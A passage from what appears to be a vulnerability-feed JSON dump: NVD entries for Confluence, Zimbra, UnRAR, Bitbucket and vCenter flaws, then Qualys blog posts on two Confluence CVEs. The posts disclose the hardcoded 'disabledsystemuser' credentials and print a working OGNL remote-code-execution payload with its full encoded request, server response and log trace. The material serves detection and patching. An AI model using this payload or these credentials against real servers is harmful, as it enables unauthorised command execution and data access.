"attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-20T18:15:00", "type": "cve", "title": "CVE-2022-26138", "cwe": ["CWE-798"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26138"], "modified": "2022-08-04T14:13:00", "cpe": ["cpe:/a:atlassian:questions_for_confluence:2.7.35", "cpe:/a:atlassian:questions_for_confluence:2.7.34", "cpe:/a:atlassian:questions_for_confluence:3.0.2"], "id": "CVE-2022-26138", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26138", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:atlassian:questions_for_confluence:2.7.34:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:questions_for_confluence:2.7.35:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:questions_for_confluence:3.0.2:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:31:59", "description": "Zimbra Collaboration (aka ZCS) 8.8.15 and 9.0 allows an unauthenticated attacker to inject arbitrary memcache commands into a targeted instance. These memcache commands becomes unescaped, causing an overwrite of arbitrary cached entries.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-04-21T00:15:00", "type": "cve", "title": "CVE-2022-27924", "cwe": ["CWE-74"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27924"], "modified": "2022-05-03T12:59:00", "cpe": ["cpe:/a:zimbra:collaboration:8.8.15", "cpe:/a:zimbra:collaboration:9.0.0"], "id": "CVE-2022-27924", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-27924", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:zimbra:collaboration:9.0.0:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:-:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:37:15", "description": "RARLAB UnRAR before 6.12 on Linux and UNIX allows directory traversal to write to files during an extract (aka unpack) operation, as demonstrated by creating a ~/.ssh/authorized_keys file. NOTE: WinRAR and Android RAR are unaffected.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-05-09T08:15:00", "type": "cve", "title": "CVE-2022-30333", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2022-10-26T02:35:00", "cpe": [], "id": "CVE-2022-30333", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-30333", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2023-06-03T14:53:22", "description": "Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 allows remote attackers with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request. This vulnerability was reported via our Bug Bounty Program by TheGrandPew.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-25T06:15:00", "type": "cve", "title": "CVE-2022-36804", "cwe": ["CWE-77"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-36804"], "modified": "2023-03-24T19:15:00", "cpe": ["cpe:/a:atlassian:bitbucket:8.3.0"], "id": "CVE-2022-36804", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-36804", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:atlassian:bitbucket:8.3.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:21:53", "description": "The vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-23T12:15:00", "type": "cve", "title": "CVE-2021-22005", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2021-11-30T22:36:00", "cpe": ["cpe:/a:vmware:vcenter_server:6.5", "cpe:/a:vmware:vcenter_server:6.7", "cpe:/a:vmware:vcenter_server:7.0"], "id": "CVE-2021-22005", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22005", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:vmware:vcenter_server:7.0:-:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:-:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:-:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:31:59", "description": "Zimbra Collaboration (aka ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. An authenticated user with administrator rights has the ability to upload arbitrary files to the system, leading to directory traversal.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-21T00:15:00", "type": "cve", "title": "CVE-2022-27925", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925"], "modified": "2022-10-28T19:11:00", "cpe": ["cpe:/a:zimbra:collaboration:8.8.15", "cpe:/a:zimbra:collaboration:9.0.0"], "id": "CVE-2022-27925", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-27925", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zimbra:collaboration:9.0.0:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:-:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:21:47", "description": "The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-24T17:15:00", "type": "cve", "title": "CVE-2021-21972", "cwe": ["CWE-306", "CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/a:vmware:vcenter_server:6.5", "cpe:/a:vmware:vcenter_server:6.7", "cpe:/a:vmware:vcenter_server:7.0"], "id": "CVE-2021-21972", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21972", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:vmware:vcenter_server:7.0:-:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update1:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update1e:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update1a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:f:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update1:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update2a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update2c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3f:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3j:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update1d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:-:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update1g:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3g:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3k:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:e:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update1b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3f:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update2:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:-:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2g:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2c:*:*:*:*:*:*"]}], "qualysblog": [{"lastseen": "2022-08-19T00:02:03", "description": "Over the last few months, Atlassian Confluence has increasingly become a target for attackers. In June 2022, a critical severity OGNL Remote Code Execution vulnerability was disclosed (CVE-2022-26134). More recently, CVE-2022-26138 was disclosed on social media platforms in July 2022.\n\nIn CVE-2022-26138, a Confluence user account is created by the Questions for Confluence app with hardcoded credentials stored inside the plugin jar file available on [Atlassian packages](<https://packages.atlassian.com/maven-atlassian-external/com/atlassian/confluence/plugins/confluence-questions/3.0.2/>). An attacker with knowledge of these credentials could log into the Confluence application and access all contents within the confluence-users group. [Atlassian](<https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html>) has rated the vulnerability "critical" and highlighted that the vulnerability is being exploited in the wild.\n\nDue to the nature of this vulnerability, it can only be verified remotely by logging into the Confluence application with the hardcoded credentials. Traditional open source scanners and scripts are checking for the Location HTTP response header and 302 status code to verify the credentials, which could result in false positives. [Qualys Web Application Scanning](<https://www.qualys.com/apps/web-app-scanning/>) has released QID 150556 that confirms the vulnerability detection in two steps. The detection takes an additional step to verify the valid credentials by navigating to the user profile page and verifying that the correct page is returned. This check is much more efficient in comparison to open source scanners and eliminates any possibility of false positives.\n\n## About CVE-2022-26138\n\nAccording to Confluence's [Questions for Confluence Security Advisory](<https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html>), both Confluence Server and Confluence Data Center products using affected versions of the Questions for Confluence app are impacted by CVE-2022-26138.\n\nAffected versions :\n\nQuestions for Confluence 2.7.x| 2.7.34 \n2.7.35 \n---|--- \nQuestions for Confluence 3.0.x| 3.0.2 \n \n## Hardcoded Credentials Vulnerability\n\nAffected versions of the Questions for Confluence app, when installed on a Confluence application, create a user account with username `disabledsystemuser` and password `disabled1system1user6708` and the account is added to confluence-users group, which allows viewing and editing all non-restricted pages within Confluence [by default](<https://confluence.atlassian.com/doc/confluence-groups-139478.html>). A remote attacker can easily leverage these credentials to browse sensitive contents within the Confluence application.\n\nThese hardcoded credentials are stored in `default.properties` file inside a [`confluence-questions-X.X.X.jar` file](<https://packages.atlassian.com/maven-atlassian-external/com/atlassian/confluence/plugins/confluence-questions/3.0.2/>), as shown below.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/08/decompile.jpg)\n\n## Detecting the Vulnerability with Qualys Web Application Scanning\n\nExisting Qualys customers can detect CVE-2022-26138 on their target Confluence instance with Qualys Web Application Scanning (WAS) using the following Qualys ID (QID):\n\n * 150556 : Atlassian Confluence Server and Data Center : Questions for Confluence App - Hardcoded Credentials (CVE-2022-26138)\n\nThe QID is part of the core category. A vulnerability scan with a core or custom search list including the QID in the options profile will flag all vulnerable applications, as shown below.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/08/kb.jpg)\n\n### Qualys WAS Report\n\nOnce the vulnerability is successfully detected by Qualys WAS, the user will see similar results in the vulnerability scan report, as shown here:\n\n![](https://blog.qualys.com/wp-content/uploads/2022/08/report.jpg)\n\n### Solution & Mitigation\n\nTo remediate this vulnerability, any organization using the Questions for Confluence app is advised to ensure the following:\n\n * Upgrade to Version 2.7.x >= 2.7.38 (compatible with Confluence 6.13.18 through 7.16.2) and Versions >= 3.0.5 (compatible with Confluence 7.16.3 and later)\n * Disable or delete the disabledsystemuser account\n\nPlease note that uninstalling the Questions for Confluence app does not remediate this vulnerability. The disabledsystemuser account does not automatically get removed after the app has been uninstalled. It is possible for this account to be present if the Questions for Confluence app was previously installed. It is advised to check the list of active users to ensure the Confluence instance is not affected.\n\n### Credit\n\n**Confluence Security Advisory:** <https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html>\n\n### CVE Details:\n\n * <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26138>\n * <https://nvd.nist.gov/vuln/detail/CVE-2022-26138>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-17T10:12:53", "type": "qualysblog", "title": "Atlassian Confluence: Questions for Confluence App Hardcoded Credentials Vulnerability (CVE-2022-26138)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134", "CVE-2022-26138"], "modified": "2022-08-17T10:12:53", "id": "QUALYSBLOG:F9C2629D40A6DC7640DB3D6BD4FB60B3", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-29T21:59:19", "description": "On June 02, 2022, Atlassian published a [security advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) about a critical severity Unauthenticated Remote Code Execution vulnerability affecting Confluence Server and Data Center. According to the advisory, the vulnerability is being actively exploited and Confluence Server and Data Center versions after 1.3.0 are affected. The vulnerability is tracked as [CVE-2022-26134](<https://nvd.nist.gov/vuln/detail/CVE-2022-26134>) with 9.8 CVSSv3 score with multiple proof of concept exploits released by security researchers on GitHub. \n\n[Qualys Web Application Scanning](<https://www.qualys.com/apps/web-app-scanning/>) released QID 150523 on June 08, 2022, to detect CVE-2022-26134, the detection sends HTTP GET request with a specially crafted OGNL payload to determine the vulnerability on the target Confluence application. The OGNL payload creates a custom HTTP response header containing the output of the system command executed on Linux and Windows systems. The detection also consists of a Qualys customized OGNL payload which is platform-independent, eliminating false positives and works irrespective of the host operating system by creating a custom HTTP response header with Qualys specified value.\n\n## About CVE-2022-26134\n\nCVE-2022-26134 is an unauthenticated OGNL Injection remote code execution vulnerability affecting Confluence Server and Data Center versions after 1.3.0. In order to exploit a vulnerable server, a remote attacker can send a malicious HTTP GET request with an OGNL payload in the URI. The vulnerable server once exploited it would allow the attacker to execute commands remotely with user privileges running the Confluence application. The vulnerability is fixed in Confluence versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1.\n\n### OGNL Injection\n\nObject-Graph Navigation Language (OGNL) is an open-source Expression Language (EL) used for getting and setting the properties of Java objects. An OGNL Injection occurs when there is insufficient validation of user-supplied data, and the EL interpreter attempts to interpret it enabling attackers to inject their own EL code.\n\nIn the case of CVE-2022-26134, the RCE attack is not complex in nature. The attack can be executed by simply sending the OGNL payload in the request URI. The payload can be crafted to add a custom HTTP response header that prints the output of successfully executed remote commands.\n\nRCE Payload\n \n \n ${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(\"id\").getInputStream(),\"utf-8\")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(\"X-Qualys-Response\",#a))}\n\nBreaking the above payload, variable `a` is assigned the value of an expression which calls various static methods using syntax `@class@method(args)`, where `java.lang.Runtime` class calls `exec` method which executes `id` command and the output is stored in the variable `a`.\n\nNext, from package `com.opensymphony.xwork2` class `ServletActionContext` is called which uses `getResponse` and `setHeader` method to fetch response of `id` system command in `X-Qualys-Response` custom header.\n\n### Exploit POC\n\nREQUEST\n \n \n GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Qualys-Response%22%2C%23a%29%29%7D/ HTTP/1.1\n Host: 127.0.0.1:8090\n User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Connection: close\n Upgrade-Insecure-Requests: 1\n\nRESPONSE\n \n \n HTTP/1.1 302 \n Cache-Control: no-store\n Expires: Thu, 01 Jan 1970 00:00:00 GMT\n X-Confluence-Request-Time: 1655819234897\n Set-Cookie: JSESSIONID=7AE586C9E49E2301BA33E5A1552D8C6F; Path=/; HttpOnly\n X-XSS-Protection: 1; mode=block\n X-Content-Type-Options: nosniff\n X-Frame-Options: SAMEORIGIN\n Content-Security-Policy: frame-ancestors 'self'\n X-Qualys-Response: uid=2002(confluence) gid=2002(confluence) groups=2002(confluence)\n Location: /login.action?os_destination=%2F%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Qualys-Response%22%2C%23a%29%29%7D%2Findex.action&permissionViolation=true\n Content-Type: text/html;charset=UTF-8\n Content-Length: 0\n Date: Tue, 21 Jun 2022 13:47:14 GMT\n Connection: close\n\nOnce the exploit is triggered it can be seen `X-Qualys-Response` HTTP response header contains the output of the `id` system command resulting in successful exploitation of this remote code execution vulnerability.\n\n## Exploit Analysis\n\nWhile analyzing the above RCE request, the Qualys WAS research team came across the Catalina log file in Confluence Server stored at `/opt/atlassian/confluence/logs/catalina.YYYY-MM-DD.log` which had multiple entries of web requests sent, along with output from `stdout` and `stderr`. Following is the snippet from the log file printing stack trace for the RCE request:\n\n* * *\n \n \n 07-Jun-2022 10:37:00.565 WARNING [Catalina-utility-4] org.apache.catalina.valves.StuckThreadDetectionValve.notifyStuckThreadDetected Thread [http-nio-8090-exec-17] (id=[347]) has been active for [75,417] milliseconds (since [6/7/22 10:35 AM]) to serve the same request for [http://127.0.0.1:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Qualys-Response%22%2C%23a%29%29%7D/] and may be stuck (configured threshold for this StuckThreadDetectionValve is [60] seconds). There is/are [1] thread(s) in total that are monitored by this Valve and\n may be stuck.\n java.lang.Throwable\n at org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1247)\n at org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1215)\n at ognl.OgnlParser.primaryExpression(OgnlParser.java:1494)\n at ognl.OgnlParser.navigationChain(OgnlParser.java:1245)\n [..SNIP..]\n at ognl.Ognl.parseExpression(Ognl.java:113)\n at com.opensymphony.xwork.util.OgnlUtil.compile(OgnlUtil.java:196)\n at com.opensymphony.xwork.util.OgnlValueStack.findValue(OgnlValueStack.java:141)\n at com.opensymphony.xwork.util.TextParseUtil.translateVariables(TextParseUtil.java:39)\n at com.opensymphony.xwork.ActionChainResult.execute(ActionChainResult.java:95)\n at com.opensymphony.xwork.DefaultActionInvocation.executeResult(DefaultActionInvocation.java:263)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:187)\n at com.atlassian.confluence.xwork.FlashScopeInterceptor.intercept(FlashScopeInterceptor.java:21)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.core.actions.LastModifiedInterceptor.intercept(LastModifiedInterceptor.java:27)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.core.ConfluenceAutowireInterceptor.intercept(ConfluenceAutowireInterceptor.java:44)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeAndHandleExceptions(TransactionalInvocation.java:61)\n at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeInTransaction(TransactionalInvocation.java:51)\n at com.atlassian.xwork.interceptors.XWorkTransactionInterceptor.intercept(XWorkTransactionInterceptor.java:50)\n at 